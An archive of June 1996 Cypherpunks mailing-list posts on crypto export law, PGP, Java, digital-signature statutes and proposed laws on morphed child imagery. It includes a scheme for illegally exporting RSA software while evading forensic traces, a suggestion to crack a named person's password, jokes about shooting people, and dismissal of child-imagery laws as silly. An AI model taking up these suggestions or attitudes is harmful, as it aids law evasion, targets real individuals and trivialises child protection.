	And doing all of their manufacturing offshore means they could
	use Triple-DES, or BlowFish, or any other crypto algorithm.

        xan

        jonathon
        grafolog@netcom.com


**********************************************************************
*								     *
*	Opinions expressed don't necessarily reflect my own views.   *
*								     *
*	There is no way that they can be construed to represent      *
*	any organization's views.				     *
*								     *
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
*								     *
*       http://members.tripod.com/~graphology/index.html             *
*								     *
***********************************************************************






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jonathon <grafolog@netcom.com>
Date: Wed, 5 Jun 1996 17:58:44 +0800
To: Sandy Sandfort <sandfort@crl.com>
Subject: Re: FOR WHOM THE BELL TOLLS
In-Reply-To: <2.2.32.19960604193049.0072daf0@popmail.crl.com>
Message-ID: <Pine.3.89.9606050441.A8556-0100000@netcom13>
MIME-Version: 1.0
Content-Type: text/plain


	Sandy:

On Tue, 4 Jun 1996, Sandy Sandfort wrote:

> goes too far and they arrest or shoot him, how can we best

	let him be a victim of his own success.

        xan

        jonathon
        grafolog@netcom.com


**********************************************************************
*								     *
*	Opinions expressed don't necessarily reflect my own views.   *
*								     *
*	There is no way that they can be construed to represent      *
*	any organization's views.				     *
*								     *
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
*								     *
*       http://members.tripod.com/~graphology/index.html             *
*								     *
***********************************************************************






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter D. Junger" <junger@pdj2-ra.F-REMOTE.CWRU.Edu>
Date: Wed, 5 Jun 1996 20:32:29 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: Re: NYT on NTT/RSA Chips
In-Reply-To: <199606041616.JAA24515@mail.pacifier.com>
Message-ID: <m0uREDw-0004M0C@pdj2-ra.F-REMOTE.CWRU.Edu>
MIME-Version: 1.0
Content-Type: text/plain


jim bell writes:

: At 10:54 AM 6/4/96 GMT, John Young wrote:
: >   An executive at NTT America said that although there were 
: >   no restrictions on the export of cryptographic hardware or 
: >   software from Japan, his company was still anxious to 
: >   obtain software from RSA Data to use in its chips. That 
: >   software is still controlled by United States export law, 
: >   he said. 
: 
: 
: Maybe it's just me, but the solution to NTT's problem is obvious.  Even 
: assuming that the export of this software would be against the law, why 
: doesn't somebody simply violate that law?  RSA would publish that software, 
: possibly encrypted with NTT's public key, on a public system protected 
: against direct export.  "Somebody" would download it, write it to a floppy 
: (taking care not to leave any fingerprints, and wetting both the stamp and 
: the envelope with tap water, rather than licking them) and mail that floppy 
: off to NTT in Japan.  (Naturally, you don't put a return address on that 
: envelope.   The truly paranoid would first take that floppy to some store's 
: PC section, and cross-load the data onto a floppy written by some other 
: floppy drive.)
: 
: NTT finds that envelope in their mail, opens it, reads the floppy, decrypts 
: the data, and say, "Wow!  It's the data we wanted to get!"  It verifies that 
: the data is valid by emailing a copy back to RSA in America, who say, 
: "Amazing!  Somebody has illegally exported our software!"
: 
: As far as I know, there is nothing wrong with NTT using this software even 
: if it is assumed to have been exported illegally.  Obviously, NTT won't 
: _ask_ for somebody to do this, because then the government will claim it was 
: all a conspiracy, but that doesn't prevent NTT from being the beneficiary of 
: somebody else's activities.

I am afraid that that is the solution to the wrong problem.  NTT's
problem is that they cannot sell the RSA chip in the United States
without a license from RSA Data under the RSA patent.  So the deal is
for RSA Data to be NTT's agent in the U.S.  But Bidzos was complaining
bitterly at the EPIC conference that the export regulations on crypto
had cost RSA Data the international market.  

The software for both DES and RSA are publically available so it would
not have solved any previously unsolved problem for someone to have
mailed the code--or the algorithms--to NTT.

--
Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH
Internet:  junger@pdj2-ra.f-remote.cwru.edu    junger@samsara.law.cwru.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Wed, 5 Jun 1996 22:09:16 +0800
To: Declan McCullagh <declan@well.com>
Subject: Re: Richard Stallman on RSA, Zimmermann, crypto
Message-ID: <199606051058.GAA03569@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


Not to defend or condemn RSA folx or patents, etc., but sometime ago 
(recently) I read or was told or perhaps hallucinated that PGP3 was 
going to include non-RSA algorithms that didn't suffer the patent 
stickiness (El Gammel based on DSA?)

Derek?

On  4 Jun 96 at 18:00, Declan McCullagh wrote:
[..]
> Richard's comments below are very much worth reading. Also check out the
[..]
> The version of PGP used outside the US is free software, but if you
> use it within the US, RSA Inc. can sue you.
> 
> This is very bad for people who would like to use PGP.  But it is
> worse than that.  It affects the political battle too.
> 
> PGP had a chance to create a constituency of Americans who demand the
> right to use encryption.  If PGP had been allowed for use in business,
> not just by hobbyists, we would have far more Americans who care
> enough to fight against Clipper--and they would include businesses
> which have the funds to influence legislators.  RSA Inc. prevented
> this from happening, and did so for no reason except money.
[..] 
---
No-frills sig.
Befriend my mail filter by sending a message with the subject "send help"
Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
        AB1F4831 1993/05/10 Deranged Mutant <wlkngowl@unix.asb.com>
Send a message with the subject "send pgp-key" for a copy of my key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christian Wettergren <cwe@it.kth.se>
Date: Wed, 5 Jun 1996 18:51:17 +0800
To: Dan Haskovec <dhaskove@ucsd.edu>
Subject: Re: Class III InfoWar: TST Article
In-Reply-To: <Pine.SUN.3.91.960604122601.20280A-100000@sdcc10.ucsd.edu>
Message-ID: <199606050626.IAA05284@piraya.electrum.kth.se>
MIME-Version: 1.0
Content-Type: text/plain



|      and the verdict is... NetMYTH!  I checked the cite in the article on 
|      cyberterrorism... no such article ran on 6/2/96 in the Times 
|      (London)... nor, in fact, in any newspaper available on Nexis... 
|      just thought I would let you know...

I've met Winn Schartau and a number of the people mentioned in the
article at a conference in Brussels about Information Warfare two
weeks ago.

I've also seen the article that is referred in the message from
Winn, and here is the URL for it.

http://www.sunday-times.co.uk/news/pages/Sunday-Times/stinwenws01016.html?1257332

Alternatively, you can access it through

http://www.the-times.co.uk/

going through a brief registration process etc.

Also, I've meet the journalist, Peter Warren, at the conference as
well. We even went for a beer! :-)

So, I'd definitively say there is too much real-world details
to it for me to believe it is a NetMYTH.

-Christian Wettergren,
 KTH/Teleinformatics
 Sweden.

PS. I'm not a netMYTH either, and I do exist. :-)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Wed, 5 Jun 1996 22:28:15 +0800
To: cypherpunks@toad.com
Subject: URL for NRC Report
Message-ID: <199606051047.KAA20751@pipe1.t1.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


Instructions for Web access to the NRC report, "Cryptography's Role in
Securing the Information Society," May 30, 1996, Prepublication Copy, are
at: 
 
 
     http://pwp.usa.pipeline.com/~jya/nrc.txt 
 
 
Appendices A to N are now in individual files. 
 
 
A few typos have been corrected in nrc00.txt and nrc06.txt. 
 
 
For the coder, mathematician and avid proofreader, we'll JPEG and forward
any page that contains equations -- such as those in Appendix C.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Howland <gary@systemics.com>
Date: Wed, 5 Jun 1996 21:45:10 +0800
To: cypherpunks@toad.com
Subject: Re: Java
Message-ID: <199606051004.MAA14816@internal-mail.systemics.com>
MIME-Version: 1.0
Content-Type: text/plain


Clay Olbon II wrote:
>
> Has anyone written a Java app to implement the Chinese Lottery?  Seems like
> a natural way to do it.  A small cash prize might entice lots of folks to
> let it run in the background...

We have plenty of Java code that does crypto.  If anyone can think
of a suitable target (and perhaps a suitable prize for the winner),
we'll help knock up some code.  Click this if you're interested
http://systemics.com:79/  (alternatively finger @systemics.com)

The only targets I can think of are the Sun/Microsoft crypto API
keys (but I would guess that these keys are too large for an
attack to be feasible), and the unix password of David Sternlight
(which was posted to sci.crypt last summer).


Gary
--
pub  1024/C001D00D 1996/01/22  Gary Howland <gary@systemics.com>
Key fingerprint =  0C FB 60 61 4D 3B 24 7D  1C 89 1D BE 1F EE 09 06




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Howland <gary@systemics.com>
Date: Wed, 5 Jun 1996 22:20:25 +0800
To: cypherpunks@toad.com
Subject: Re: Security of PGP if Secret Key Available?
Message-ID: <199606051033.MAA14983@internal-mail.systemics.com>
MIME-Version: 1.0
Content-Type: text/plain


On Jun 3,  2:36, "Robert A. Hayden" wrote:
> However, I got to wondering about the security of PGP assuming somebody
> trying to read my PGPed stuff has my 1024-bit secret key.  ie, if I have
> it on my personal computer, and somebody gets my secret key, how much
> less robust has PGP just become, and what are appropriate and reasonable
> steps to take to protect this weakness?

If the secret key is available then an attacker knows the length
of p & q.  Admittedly this will not usually help matters much,
but I still feel that the lengths of p and q should be encrypted
with the passphrase - perhaps in PGP3.0? (Derek?)

Gary
--
pub  1024/C001D00D 1996/01/22  Gary Howland <gary@systemics.com>
Key fingerprint =  0C FB 60 61 4D 3B 24 7D  1C 89 1D BE 1F EE 09 06 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Julian Assange <proff@suburbia.net>
Date: Wed, 5 Jun 1996 16:43:09 +0800
To: warlord@MIT.EDU (Derek Atkins)
Subject: Re: Why PGP isn't so ubiquitous (was NRC Session Hiss)
In-Reply-To: <9606041912.AA01215@bill-the-cat.MIT.EDU>
Message-ID: <199606050320.NAA21843@suburbia.net>
MIME-Version: 1.0
Content-Type: text


> So, would you rather see a document right away, or code released
> sooner?  Take your pick and let me know. :)
> 
> -derek

I'd rather see more good people working on it.


-- 
"Of all tyrannies a tyranny sincerely  exercised for the good of its victims  
 may be the most  oppressive.  It may be better to live under  robber barons  
 than  under  omnipotent  moral busybodies,  The robber baron's  cruelty may  
 sometimes sleep,  his cupidity may at some point be satiated; but those who  
 torment us for own good  will torment us  without end,  for they do so with 
 the approval of their own conscience."    -   C.S. Lewis, _God in the Dock_ 
+---------------------+--------------------+----------------------------------+
|Julian Assange RSO   | PO Box 2031 BARKER | Secret Analytic Guy Union        |
|proff@suburbia.net   | VIC 3122 AUSTRALIA | finger for PGP key hash ID =     |
|proff@gnu.ai.mit.edu | FAX +61-3-98199066 | 0619737CCC143F6DEA73E27378933690 |
+---------------------+--------------------+----------------------------------+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ng Pheng Siong <ngps@technet.sg>
Date: Wed, 5 Jun 1996 17:49:09 +0800
To: Sandy Sandfort <sandfort@crl.com>
Subject: Re: FOR WHOM THE BELL TOLLS
In-Reply-To: <2.2.32.19960604193049.0072daf0@popmail.crl.com>
Message-ID: <Pine.OSF.3.91.960605132750.13323H-100000@einstein.technet.sg>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 4 Jun 1996, Sandy Sandfort wrote:
> Any suggestions?

Jim Bell has a solution to that problem. 

Sorry, couldn't resist. ;)

- PS
--
Ng Pheng Siong <ngps@pacific.net.sg> * Finger for PGP key.
Pacific Internet Pte Ltd * Singapore

'The meek will inherit the earth, after the rest of us have gone to the stars.'
							- alt.2600 poster





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Chris Adams" <adamsc@io-online.com>
Date: Fri, 7 Jun 1996 20:39:46 +0800
To: "cypherpunks" <cypherpunks@toad.com>
Subject: Re: Class III InfoWar
Message-ID: <199606070507.WAA20868@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


On 2 Jun 1996 03:06:14 pdt, hal9001@panix.com wrote:

>At 21:33 -0400 6/1/96, winn@Infowar.Com wrote:
>
>
>>The article discussed the advanced information warfare techniques used by the
>>perpetrators. "According to the American National Security Agency (NSA), they
>>have penetrated computer systems using 'logic bombs' (coded devices that
>>can be
>>remotely detonated)
>
>Unless the definition has changed recently, a "logic bomb" is normally a
>piece of code in a program that is triggered when a specific event occurs
>(such as the programmer's name not appearing in a payroll file for a
>designated period of time [which might trigger a salami round off routine
>to start cutting checks 2 months after s/he is no longer working for the
>company]).

I believe that is what they were referring to. However, the press garbled it as usual. It 
seems like the original was something like 'logic bombs' (bits of code that can be 
triggered remotely). Probably sounded more impressive the reporter's way...

This Message Was Sent With An UNREGISTERED Version Of PMMail.  
Please Encourage Its Author To Register Their Copy Of PMMail.  
For More Information About PMMail And SouthSide Software's Other 
Products, Contact http://www.southsoft.com.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeffrey A Nimmo <janimmo@ionet.net>
Date: Thu, 6 Jun 1996 00:44:55 +0800
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: On the Hill: Child Porn "Morphing"
In-Reply-To: <Pine.SUN.3.91.960604163805.11159A-100000@polaris>
Message-ID: <Pine.SOL.3.91.960605065515.19215C-100000@ion1.ionet.net>
MIME-Version: 1.0
Content-Type: text/plain




On Tue, 4 Jun 1996, Black Unicorn wrote:

> 
> Hearings on the hill over the child pornographer horseman:
> 
> "Morphing" seems to be the latest buzzword for putting childrens faces on 
> the bodies of adult models in sexually explicit poses and seems to have 
> attracted enough attention to warrant congressional attention.
> 
> Interesting that the media is playing this up as a "net" deal.  (As if 
> somehow it were impossible to do without the all powerful and evil internet.

I've heard of this kind of thing before. Individuals have already been 
sent to jail for doing this, as well as doing and 
distributing kiddie porn drawings. 

I suspect that since it's already illegal on the state level, that 
Congress is looking into making it a federal crime to distribute them 
over state lines via the Internet.

> I'd like to see exactly how they word the proposed prohibitons.  What 
> constitutes "child" when the face painted on is pure artistry?  Will we 
> see a simple and strict prohibition over modifiying sexually explicit 
> pictures to make them appear to be of younger models (whatever their 
> apparent age may be)?  Will we see a subjective test as to what is "child 
> looking" enough?

It only has to give the impression of being under the age of consent in 
order to be illegal. No real models have to be involved.

> Silliness.  All silliness.

That's debatable. However, in this politically correct environment, I 
wouldn't even give the impression of siding with the pedophiles if I were 
you.

> Prediction:  Some manner of law will be on the books (Or perhaps passed, but 
> unsigned) before the election attempting to prohibit some form of this 
> activity.  Certainly Clinton is not going to veto such a bill before the 
> election, which is doubtlessly when the right is going to try to push it 
> through.  (Can they streamline it enough to get a vote in time?)

I wouldn't doubt it.

> ---
> My preferred and soon to be permanent e-mail address:unicorn@schloss.li
> "In fact, had Bancroft not existed,       potestas scientiae in usu est
> Franklin might have had to invent him."    in nihilum nil posse reverti
> 00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
> Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 6 Jun 1996 00:50:54 +0800
To: Blake Wehlage <jwilk@iglou.com>
Subject: Re: Senator Exon & me
In-Reply-To: <m0uR7Nb-00037KC@mail.iglou.com>
Message-ID: <199606051212.IAA11953@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Blake Wehlage writes:
> I am not one to lash out at anyone but now I feel it is appropite to tell
> the group what our very own Senator Exon has said to myself.

Are you sure that you weren't just getting mail from the Senator Exon
remailer? The real Senator Exon doesn't use email.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 6 Jun 1996 01:00:55 +0800
To: Ben Holiday <ncognito@gate.net>
Subject: Re: How to explain crypto?
In-Reply-To: <Pine.A32.3.93.960604185950.36410A-100000@seminole.gate.net>
Message-ID: <199606051224.IAA11983@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Ben Holiday writes:
> Im quoting directly from the PGP manual from pgp2.6.2:
> 
> "People who work in factoring research say that the workload to
> exhaust all the possible 128-bit keys in the IDEA cipher would
> roughly equal the factoring workload to crack a 3100-bit RSA key,
> which is quite a bit bigger than the 1024-bit RSA key size that most
> people use for high security applications..."
> 
> If we take phil at his word, I would say that comparing 90bit symetric to
> 1024bit RSA would be a bit generous to RSA. 

It is very far from clear that Phil was right.

As I said, these comparisons are all based on insufficient data. I
don't think they are a great idea.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "P.J. Ponder" <ponder@wane-leon-mail.scri.fsu.edu>
Date: Thu, 6 Jun 1996 04:30:36 +0800
To: cypherpunks@toad.com
Subject: Re: Electronic Signature Act of 1996
Message-ID: <Pine.3.89.9606050852.A28531-0100000@wane3.scri.fsu.edu>
MIME-Version: 1.0
Content-Type: text/plain


The Florida act is available at
  http://www.scri.fsu.edu/fla-leg/bills/senate-1996/sb0942.html

as was repeatedly brought up during hearings on this bill, the existing 
law does not preclude digital signatures from being used or from being 
offered in evidence in support of an argument that so-and-so 'signed' or 
agreed to something.  What the sponsors of this bill wanted was to 
provide additional credence and an air of legitimacy to digital 
signatures, even tho the existing law already permits their use.

In practice, if one asserted a digital signature as evidence of another's 
agreement to a contract for example, the party making the assertion could 
offer other evidence to attest to the validity of the signature, just as 
one would do in the case of a hand-written or holographic signature. (by 
bringing in handwriting experts, e.g.)

The interesting thing to watch in Florida will be the rules and 
procedures to be developed by the (Florida) Secretary of State's office 
relating to certificate authorities, licensing requirements, CRLs, etc.
</end of free legal advice>

I think the Florida Bar wants me to add to that if you feel you have a 
legal problem of any kind, you should seek the advice of a competent 
attorney.  I am not representing you and you rely on cypherpunks mailing 
list legal advice at your peril.
--
pj




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@cs.berkeley.edu>
Date: Thu, 6 Jun 1996 04:12:01 +0800
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: Java
In-Reply-To: <199606041306.JAA08943@jekyll.piermont.com>
Message-ID: <31B58982.1F54@cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


Vladimir Z. Nuri wrote:
[...]

> you don't get it, as others have pointed out repeatedly. you conveniently
> ignore Frantz' points about the well-known difficulties of porting C. there
> is a big difference in what is conneted by the word "portable".
> if it take a zillion different makefile rules to create the "same"
> program on different machines, is that "portable"? isn't that
> defeating the purpose somewhat? c is "sort of" portable. it is
> "in theory" portable. Java is portable "in theory and practice".

   This point is simply not true, at least for Java as it exists in 
Spring 1996. Almost every Java applet I've seen has little UI glitches 
that prevent it from displaying and operating correctly on all 
platforms. Further, there are little glitches in the language 
implementation and library design that often cause portability problems. 
For example, the first cut of Hal's PGP applet had the standard UI 
problems, plus the fact that a "spinner" thread caused the entire 
browser to lock up -- on Unix, but not on Windows. And this was a 5000 
line of code applet. Hal was able to fix the problems, but it's easy to 
see how the effort involved in this "portability engineering" could 
become comparable to your thousand-line makefile as applications scale 
up.
   The promise is there, but Java has not yet delivered.

   Another concern with Java is that it acheives portability at the cost 
of enforcing a lowest common denominator. For example, all real Windows 
applications support OLE, and all real Mac applications support Apple 
Events. Java applets, and even applications, can't do either. To me, 
that makes the accomplishment of portability a bit less impressive, even 
if it were so.

Raph




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Intense <exalt@miworld.net>
Date: Thu, 6 Jun 1996 04:05:55 +0800
To: cypherpunks@toad.com
Subject: Re: On the Hill: Child Porn "Morphing"
In-Reply-To: <199606050531.WAA27734@netcom7.netcom.com>
Message-ID: <Pine.LNX.3.91.960605091831.4132F-100000@invictor.miworld.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 4 Jun 1996, Bill Frantz wrote:

> At  4:45 PM 6/4/96 -0400, Black Unicorn wrote:
> >"Morphing" seems to be the latest buzzword for putting childrens faces on 
> >the bodies of adult models in sexually explicit poses and seems to have 
> >attracted enough attention to warrant congressional attention.
> 
> The ability to use the faces of famous political people (e.g. Bill&Hillery
> or Bob&Libby) in XXXX rated political satire probably has a wider market.


I am just wondering, when the USA can get a little bit more ridiculus.
They seem to have on there "good shoes" when if you look in the past, 
most of the goverment officals have been notihing but people that are 
involved with allot more ilegal activies than the average resident... 
i'ts sad what they will do, to get elected.. 

:(


               *          <exalt@miworld.net>           *







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike McNally <m5@vail.tivoli.com>
Date: Thu, 6 Jun 1996 09:01:44 +0800
To: Jeffrey A Nimmo <janimmo@ionet.net>
Subject: Re: On the Hill: Child Porn "Morphing"
In-Reply-To: <Pine.SOL.3.91.960605065515.19215C-100000@ion1.ionet.net>
Message-ID: <31B597DC.6D03@vail.tivoli.com>
MIME-Version: 1.0
Content-Type: text/plain


Jeffrey A Nimmo wrote:
> ...
> It only has to give the impression of being under the age of consent in
> order to be illegal. No real models have to be involved.
> 
> > Silliness.  All silliness.
> 
> That's debatable.

Anything's debatable, but silliness it remains.  The entire (also
silly, but tediously common) "but there's a real victim involved"
argument goes out the window.  And where's the line drawn?  Like
take for example this filthy little number:

		o+<

Pretty wild, huh?  I mean, so young, and so willing!  Boy, I'm
gettin' all sweaty here just thinking about it; I'd better send
off this note quick and go take a cold shower.

______c_____________________________________________________________________
Mike M Nally * Tiv^H^H^H IBM * Austin TX    * pain is inevitable  
       m5@tivoli.com * m101@io.com          *
      <URL:http://www.io.com/~m101>         * suffering is optional




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bruce M." <brucem@wichita.fn.net>
Date: Thu, 6 Jun 1996 08:21:53 +0800
To: cypherpunks@toad.com
Subject: Re: Cost of brute force decryption
In-Reply-To: <199606050631.CAA01285@unix.asb.com>
Message-ID: <Pine.BSI.3.91.960605092010.23845A-100000@wichita.fn.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 5 Jun 1996, Deranged Mutant wrote:

> The figures look familiar.  No references around.  I'm not sure it would 
> require a whole two weeks for 40-bits, though.  Possibly less than a 
> day? (Or was that why you asked baout the figures?)
> 
> The "$10,000 worth of supercomputer time" is fuzzy.  One thing that's
> left out is that once an organization already owns the equipment and 
> has the money to spare, it may be worthwhile to crack things of less 
> importance like personal checking info, email, etc.

    Obviously this will depend on what type of computer(s) you are using 
among other things.  That was what I'm curious about.  Is there some type 
of rough formula where you could just plug in the different variables 
(computer speed, speed of each attempt, key length, etc.) and come up 
with some type of answer.  I was also curious to find out if anyone knew 
where he had come up with these figures.

                    Bruce M. * brucem@feist.com
        ~---------------------------------------------------~
        "Knowledge enormous makes a god of me." -- John Keats





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 6 Jun 1996 10:39:25 +0800
To: "Peter D. Junger" <cypherpunks@toad.com>
Subject: Re: NYT on NTT/RSA Chips
Message-ID: <199606051641.JAA06608@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:45 AM 6/5/96 -0400, Peter D. Junger wrote:
  
>The software for both DES and RSA are publically available so it would
>not have solved any previously unsolved problem for someone to have
>mailed the code--or the algorithms--to NTT.


Here's something to think about:  At this point, the USG apparently doesn't attempt to restrict the IMPORTATION of crypto software and hardware.  Yet, it calls it "munitions" and the government certainly claims the authority under certain circumstances to restrict munitions imports:  For example, automatic rifles and Chinese "assault weapons" (sic).

Until this new NTT/RSA chip, there has not been much that the USG wanted to keep out that it could keep out.  Software is easily copied, so that is futile.  Hardware is more practical to restrict, but until substantial quantities are imported it doesn't constitute much of a threat.  Wouldn't it be reasonable to suspect that the advent of this NTT chip set might induce the government to start restricting crypto hardware import, under some odd new interpretation of ITAR rules?

If so, I think NTT should immediately import into the US the database for the design and testing of this chip, on the offchance that the USG gets uppity and decides to ban its import.  At that point, they merely start manufacture domestically, supplying the domestic market.


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Massaglia <massagj@spock.et.byu.edu>
Date: Thu, 6 Jun 1996 09:18:05 +0800
To: cypherpunks@toad.com
Subject: Re: Electronic Signature Act Of 1996
Message-ID: <2.2.32.19960605154749.009c6ac4@spock.et.byu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Hi everybody.  This is my first de-lurking.

For those interested in how Utah's Signature policy works, check out this
web page:

http://www.state.ut.us/ccjj/digsig/default.htm

This web page includes the text and commentary of the digital signature act,
illustrations, guidelines of the American Bar Association regarding digital
signatures, and a bunch of other stuff.

>From what I understood, in Utah, you need to get a digital signature from a
company that verifies your signature.  Once this has been done, it can be
used for commerce on the internet.  Provision have also been included to
revoke certificates, and explanations are given on who is liable in
different situations.
------
John Massaglia
mrklaw@itsnet.com

"The next generation of interesting software will be done on the Macintosh,
not the IBM PC."
	-- Bill Gates, Microsoft Chairman, BusinessWeek, November 26, 1984





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Thu, 6 Jun 1996 11:07:12 +0800
To: jim bell <cypherpunks@toad.com
Subject: Re: MELP: 2400 baud speech coding
Message-ID: <2.2.32.19960605171401.00729e58@popmail.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                       SANDY SANDFORT
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

C'punks,

At 08:28 PM 6/4/96 -0800, jim bell wrote:

>Which raises another question:  When are Internet ISP's 
>going to start acting as Internet-phone gateways?...Any 
>guesses as to when this will be real?

After Jim Bell has shot a few recalcitrant ISP operators?


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mixmaster <mixmaster@remail.obscura.com>
Date: Thu, 6 Jun 1996 12:44:56 +0800
To: cypherpunks@toad.com
Subject: OECD on Crypto
Message-ID: <199606051722.KAA06376@sirius.infonex.com>
MIME-Version: 1.0
Content-Type: text/plain


[haven't seen this on cypherpunks yet]

OECD NEWS RELEASE - Paris, 10 May 1996 

OECD EXPERTS BEGIN DRAFTING CRYPTOGRAPHY GUIDELINES 

Cryptography experts from OECD countries have begun drafting a
proposal for OECD Cryptography Policy Guidelines that governments can
use as a guide to formulate their national policies on encryption. 

Many governments are under pressure within their own countries to
develop a national position on cryptography, which is used in computer
technology to protect everything from product designs to health and
tax records and global correspondence. But the needs of global
technologies and applications require an international --rather than a
strictly national -- approach to policymaking. The fast-paced
development of the Global Information Infrastructure adds an element
of urgency.

The business community, individuals and national security and law enforcement
agencies are all pressing for encryption guidelines and the OECD will strive to
reflect the legitimate interests of all these groups as it drafts Guidelines. 

The private sector is closely involved in drafting the Guidelines,
with business representatives from the Business and Industry Advisory
Committee (BIAC) participating at the meeting. 

The OECD meeting, which took place on 8 May, was hosted by the US
Department of State in Washington DC. It was held immediately after a
Second Business Government Forum on Global Cryptography Policy in
Washington DC on 7 May, which was cosponsored by the OECD, the 
International Chamber of Commerce (ICC) and the Business and Industry Advisory
Committee (BIAC) to the OECD. Two similar conferences took place in Paris in
December, when OECD countries and business representatives met for the
first time to discuss international cryptography policy. 

The process of drafting the OECD Cryptography Policy Guidelines will
continue at an experts meeting in June and is due for completion in
early 1997.

For further information, please contact Ms. Hiroko Kamata, OECD 
Directorate for Science, 
Technology and Industry (tel. 331 45 24 80 04 - fax. 331 45 24 93 32 - 
e-mail. hiroko.kamata@oecd.org).








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bruce M." <brucem@wichita.fn.net>
Date: Thu, 6 Jun 1996 10:49:42 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: Re: On the Hill: Child Porn "Morphing"
In-Reply-To: <Pine.SUN.3.91.960604163805.11159A-100000@polaris>
Message-ID: <Pine.BSI.3.91.960605101735.23845C-100000@wichita.fn.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 4 Jun 1996, Black Unicorn wrote:

> Hearings on the hill over the child pornographer horseman:
> 
> "Morphing" seems to be the latest buzzword for putting childrens faces on 
> the bodies of adult models in sexually explicit poses and seems to have 
> attracted enough attention to warrant congressional attention.
> 
> I'd like to see exactly how they word the proposed prohibitons.  What 
> constitutes "child" when the face painted on is pure artistry?  Will we 
> see a simple and strict prohibition over modifiying sexually explicit 
> pictures to make them appear to be of younger models (whatever their 
> apparent age may be)?  Will we see a subjective test as to what is "child 
> looking" enough?

	As far as I was aware, the manner of currently judging the age of 
people in nude photographs consisted of a usually doctor administered 
examination (of the picture) where the genitals and other age 
characteristics of the BODY were taken into account.  I don't think a 
person's face ever was, or ever should be, a factor.

> Silliness.  All silliness.

	Very true.  Next there will be laws banning provocative pictures of
adults dressed in child-like garb or acting out child-like sexual 
fantasies (the infamous "spank me Daddy!).


                    Bruce M. * brucem@feist.com
        ~---------------------------------------------------~
        "Knowledge enormous makes a god of me." -- John Keats





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bruce M." <brucem@wichita.fn.net>
Date: Thu, 6 Jun 1996 12:30:38 +0800
To: Jeffrey A Nimmo <janimmo@ionet.net>
Subject: Re: On the Hill: Child Porn "Morphing"
In-Reply-To: <Pine.SOL.3.91.960605065515.19215C-100000@ion1.ionet.net>
Message-ID: <Pine.BSI.3.91.960605103208.23845D-100000@wichita.fn.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 5 Jun 1996, Jeffrey A Nimmo wrote:

> That's debatable. However, in this politically correct environment, I 
> wouldn't even give the impression of siding with the pedophiles if I were 
> you.

    Sometimes you have to decide whether to be politically correct or right.

                    Bruce M. * brucem@feist.com
        ~---------------------------------------------------~
        "Knowledge enormous makes a god of me." -- John Keats





